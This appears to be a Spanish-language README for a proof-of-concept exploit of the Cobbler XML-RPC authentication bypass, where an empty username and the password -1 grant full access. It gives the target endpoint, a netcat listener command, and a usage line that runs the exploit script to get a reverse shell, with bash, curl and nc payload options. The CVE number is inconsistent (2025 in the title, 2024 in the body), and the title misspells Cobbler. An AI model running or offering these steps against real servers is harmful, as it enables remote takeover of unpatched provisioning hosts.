
PoC de CVE-2025-47533 Clobber RCE
Cobbler, un servidor de instalación de Linux que permite el aprovisionamiento rápido de entornos de instalación en red, tiene una vulnerabilidad de autenticación en las versiones 3.0.0 hasta (pero sin incluir) 3.2.3 y 3.3.7. La función utils.get_shared_secret() siempre devuelve -1, lo que permite que cualquier persona se conecte a la interfaz XML-RPC de Cobbler con un nombre de usuario vacío ('') y la contraseña -1. Esto permite que un atacante con acceso a la red obtenga el control total del servidor Cobbler. La vulnerabilidad está corregida en las versiones 3.2.3 y 3.3.7.
La vulnerabilidad se debe al manejo incorrecto del secreto compartido en la función utils.get_shared_secret(), que siempre devuelve -1, evitando efectivamente la autenticación. Esto permite que cualquier usuario de la red se conecte a la interfaz XMLRPC de Cobbler con credenciales vacías y ejecute comandos arbitrarios.
http://<target>:25151/ — endpoint de la API XMLRPC de Cobbler
El script del exploit admite varios payloads de shell inversa, incluyendo:
nc)Inicia un listener de Netcat en tu máquina:
nc -lvnp 4444
Ejecuta el script del exploit CVE-2024-47533.py.
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : Objetivo (Ejemplo: -t http://1<IP_SERVICE>:<PORT>)
-l: IP Local (Ejemplo: -l 10.10.11.80)
-p : Puerto <LOCAL_PORT> (Ejemplo: -p 4444)
--payload: Payload(bash, curl, nc) (Ejemplo: --payload bash)
Con una ejecución exitosa, la shell inversa se conectará de vuelta al listener, otorgando al atacante acceso remoto al servidor.